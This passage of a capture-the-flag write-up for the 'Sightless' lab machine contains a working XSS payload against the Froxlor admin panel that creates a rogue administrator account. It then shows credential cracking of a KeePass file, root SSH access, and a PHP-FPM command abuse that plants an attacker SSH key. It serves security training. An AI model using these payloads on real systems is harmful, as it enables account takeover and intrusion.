admin{{$emit.constructor`function b(){var metaTag=document.querySelector(\'meta[name="csrf-token"]\');var csrfToken=metaTag.getAttribute(\'content\');var xhr=new XMLHttpRequest();var url="http://admin.sightless.htb:8080/admin_admins.php";var params="new_loginname=adminkit&admin_password=Abcd@@1234&admin_password_suggestion=mgphdKecOu&def_language=en&api_allowed=0&api_allowed=1&name=Abvcd&email=adminadmin@gmail.com&custom_notes=&custom_notes_show=0&ipaddress=-1&change_serversettings=0&change_serversettings=1&customers=0&customers_ul=1&customers_see_all=0&customers_see_all=1&domains=0&domains_ul=1&caneditphpsettings=0&caneditphpsettings=1&diskspace=0&diskspace_ul=1&traffic=0&traffic_ul=1&subdomains=0&subdomains_ul=1&emails=0&emails_ul=1&email_accounts=0&email_accounts_ul=1&email_forwarders=0&email_forwarders_ul=1&ftps=0&ftps_ul=1&mysqls=0&mysqls_ul=1&csrf_token="+csrfToken+"&page=admins&action=add&send=send";xhr.open("POST",url,true);xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");xhr.send(params)};a=b()`()}}

Make sure to url encode the payload before send the request

image.webp

Now we can login with our credential from the payload adminkit:Abcd@@1234

image.webp

Click on Customers under Traffic and then click on the web1 user

image.webp

image.webp

After clicking the username you will find the settings for the FTP server

FTP

image.webp

Change it to your desired password and hit save

image.webp

1
2
3
4
5
6
7
└─# ftp sightless.htb -p 21
Connected to sightless.htb.
220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
Name (sightless.htb:kali): web1
550 SSL/TLS required on the control channel
ftp: Login failed
ftp>

The login failed and it says that SSL/TLS is required. So I will use lftp for this purpose

1
2
3
4
**└─# lftp sightless.htb
lftp sightless.htb:~> login web1 Abcd@@1234
lftp web1@sightless.htb:~> ls
ls: Fatal error: Certificate verification: The certificate is NOT trusted. The certificate issuer is unknown.  (A1:4B:95:93:0A:CF:15:CD:DD:52:68:ED:DB:5B:92:ED:F0:F3:3C:69)**

The login succeeded but the certificate verification failed. Because it’s over TLS, and the certificate isn’t signed by a trusted CA

We will disable the certificate verification and proceed,

1
2
3
4
lftp web1@sightless.htb:~> set ssl:verify-certificate no
lftp web1@sightless.htb:~> ls
drwxr-xr-x   3 web1     web1         4096 May 17  2024 goaccess
-rw-r--r--   1 web1     web1         8376 Mar 29  2024 index.html
1
2
3
4
5
6
7
8
lftp web1@sightless.htb:/> get index.html
8376 bytes transferred in 3 seconds (2.6 KiB/s)
lftp web1@sightless.htb:/> ls goaccess/
drwxr-xr-x   2 web1     web1         4096 Aug  2 07:14 backup
lftp web1@sightless.htb:/> ls goaccess/backup/
-rw-r--r--   1 web1     web1         5292 Aug  6 14:29 Database.kdb
lftp web1@sightless.htb:/> get goaccess/backup/Database.kdb
5292 bytes transferred in 4 seconds (1.3 KiB/s)

We will get the index.html file and also the kdb()file

Keepass DB

1
2
└─# kpcli --kdb=Database.kdb
Provide the master password:

We need a the password to get data from database file

1
2
└─# keepass2john Database.kdb > Database.kdb.hash
Inlining Database.kdb
1
2
3
4
5
6
7
8
9
10
11
12
└─# john Database.kdb.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 600000 for all loaded hashes
Cost 2 (version) is 1 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bulldogs         (Database.kdb)
1g 0:00:00:26 DONE (2025-01-13 22:43) 0.03725g/s 39.34p/s 39.34c/s 39.34C/s kucing..stars
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The password is bulldogs and we can use it for further enumeration

1
2
3
4
5
6
7
8
9
10
└─# kpcli --kdb=Database.kdb
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
General/
1
2
3
4
5
6
7
8
9
10
11
12
kpcli:/General/sightless.htb/Backup> ls
=== Entries ===
0. ssh
kpcli:/General/sightless.htb/Backup> show -f ssh

 Path: /General/sightless.htb/Backup/
Title: ssh
Uname: root
 Pass: q6gnLTB74L132TMdFCpK
  URL:
Notes:
Atchm: id_rsa (3428 bytes)

There is an id_rsa attachment that we can see. Let’s get that attachment

1
2
3
4
5
6
7
8
kpcli:/> attach General/sightless.htb/Backup/ssh
Atchm: id_rsa (3428 bytes)
Choose: (a)dd/(e)xport/(d)elete/(c)ancel/(F)inish?
Path to file: /root/id_rsa
Saved to: /root/id_rsa
Atchm: id_rsa (3428 bytes)
Choose: (a)dd/(e)xport/(d)elete/(c)ancel/(F)inish?
kpcli:/>

Root

Let’s change the permission of the ssh key file

1
2
3
4
5
6
7
└─# ls -la id_rsa
-rw-r--r-- 1 root root 3428 Jan 13 22:57 id_rsa

└─# chmod 600 id_rsa

└─# ls -la id_rsa
-rw------- 1 root root 3428 Jan 13 22:57 id_rsa

Now with the retrieved id_rsa file we try to login as root and provide the password, q6gnLTB74L132TMdFCpK, when prompted

I was facing the below issue while ssh into the machine,

1
2
3
└─# ssh -i id_rsa root@10.10.11.32
Load key "id_rsa": error in libcrypto
root@10.10.11.32's password:

So I formatted the key to not have any extra space or lines,

1
2
3
4
5
6
7
8
9
└─# dos2unix id_rsa
dos2unix: converting file id_rsa to Unix format...

└─# echo "" >> id_rsa

└─# ssh -i id_rsa root@10.10.11.32
Last login: Tue Sep  3 08:18:45 2024
root@sightless:~# id
uid=0(root) gid=0(root) groups=0(root)

Now we can get the root flag,

1
2
root@sightless:~# cat root.txt
f661xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Unintended Paths to root

Chrome

Previously we saw there was some processes run by john

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
michael@sightless:~$ ps auxww | grep john
john        1133  0.0  0.0   2892   952 ?        Ss   Jan13   0:00 /bin/sh -c sleep 140 && /home/john/automation/healthcheck.sh
john        1134  0.0  0.0   2892   984 ?        Ss   Jan13   0:00 /bin/sh -c sleep 110 && /usr/bin/python3 /home/john/automation/administration.py
john        1495  0.0  0.6  33660 24452 ?        S    Jan13   0:58 /usr/bin/python3 /home/john/automation/administration.py
john        1496  0.4  0.3 33630172 15292 ?      Sl   Jan13   5:29 /home/john/automation/chromedriver --port=52119
john        1501  0.0  0.0      0     0 ?        Z    Jan13   0:00 [chromedriver] <defunct>
john        1507  0.8  2.8 34019516 111996 ?     Sl   Jan13   9:40 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.qRbgKp data:,
john        1509  0.0  0.0 33575860 3252 ?       Sl   Jan13   0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
john        1513  0.0  1.4 34112456 56296 ?      S    Jan13   0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1509 --enable-crash-reporter
john        1514  0.0  1.4 34112456 57128 ?      S    Jan13   0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1509 --enable-crash-reporter
john        1531  0.7  3.0 34363612 122328 ?     Sl   Jan13   8:29 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1509 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
john        1532  0.1  2.2 33900068 88816 ?      Sl   Jan13   2:13 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1509 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,17262953995491336041,9664230327599645379,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
john        1560  3.7  4.1 1186800752 165544 ?   Sl   Jan13  43:51 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1509 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1736793700667017 --launc
john        1590  0.0  0.0   7372  3420 ?        S    Jan13   0:01 /bin/bash /home/john/automation/healthcheck.sh
john       29555  0.0  0.0   5772  1004 ?        S    14:03   0:00 sleep 60
michael    29561  0.0  0.0   6612  2228 pts/0    S+   14:04   0:00 grep --color=auto john

We can see that the chrome process is set to --remote-debugging-port=0

The option --remote-debugging-port=0 indicates that the process has enabled remote debugging but has chosen to let the system automatically assign a random unused port for this purpose. This also avoids port conflicts as it allows dynamic port assignment.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
michael@sightless:~$ netstat -tnl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:52119         0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:46193         0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:40917         0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
tcp6       0      0 :::21                   :::*                    LISTEN
  • cmd info
    • t: Displays TCP connections.
    • l: Shows only listening sockets (services waiting for incoming connections).
    • n: Disables name resolution for addresses and ports, showing them as raw IP addresses and port numbers.

From the output we can see some unusual ports. These could be our chrome driver ports for debugging

Let’s forward one of those ports to our machine

After trying all only one of them worked

1
2
└─# ssh -N -f -L 40917:localhost:40917 michael@sightless.htb
michael@sightless.htb's password:
1
2
3
4
5
6
7
8
9
10
└─# curl 127.0.0.1:40917/json
[ {
   "description": "",
   "devtoolsFrontendUrl": "/devtools/inspector.html?ws=127.0.0.1:40917/devtools/page/EDD0C336A98074C6C8D63DD82D070D5A",
   "id": "EDD0C336A98074C6C8D63DD82D070D5A",
   "title": "Froxlor",
   "type": "page",
   "url": "http://admin.sightless.htb:8080/index.php",
   "webSocketDebuggerUrl": "ws://127.0.0.1:40917/devtools/page/EDD0C336A98074C6C8D63DD82D070D5A"
} ]

image.webp

After adding the port to our browser we can see two new targets

image.webp

Let’s click on the inspect or inspect fallback on the first tab

The bot will login at some point automatically and will take you to the dashboard

image.webp

image.webp

It constantly changes and the logs are loaded every time. So I clicked on Preserve log and waited for sometime till the cycle completes and then clicked on the red button stop the logs

image.webp

image.webp

PHP-FPM

We found the login credentials for admin:ForlorfroxAdmin

And we can login,

image.webp

Understanding PHP-FPM: A Comprehensive Guide

image.webp

I typed in the reverse shell into the restart command,

image.webp

When I clicked save, I got,

image.webp

Looks like there are some filters for special characters

SSH

We will create a new ssh key pair. Then we will write a script on /dev/shm/kit.sh folder and then trigger that script via php-fpm to store that ssh key

1
2
3
4
5
6
7
michael@sightless:/dev/shm$ cat kit.sh
#!/bin/bash

mkdir -p /root/.ssh
chmod 700 /root/.ssh
echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9eUkLWgGchiILvCy3toymse1so22Tc2sDpATFB6ReQ root@kali" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys

Change the restart command to trigger the script

image.webp

Then go to the below section,

image.webp

Toggle the button off and save it first

image.webp

Then toggle it back on and then save. This will trigger the script and after sometime we can login with our ssh key

image.webp

1
2
3
4
└─# ssh -i id_ed25519 root@10.10.11.32
Last login: Tue Jan 14 21:00:03 2025 from 10.10.16.8
root@sightless:~# id
uid=0(root) gid=0(root) groups=0(root)

References

This post is licensed under CC BY 4.0 by the author.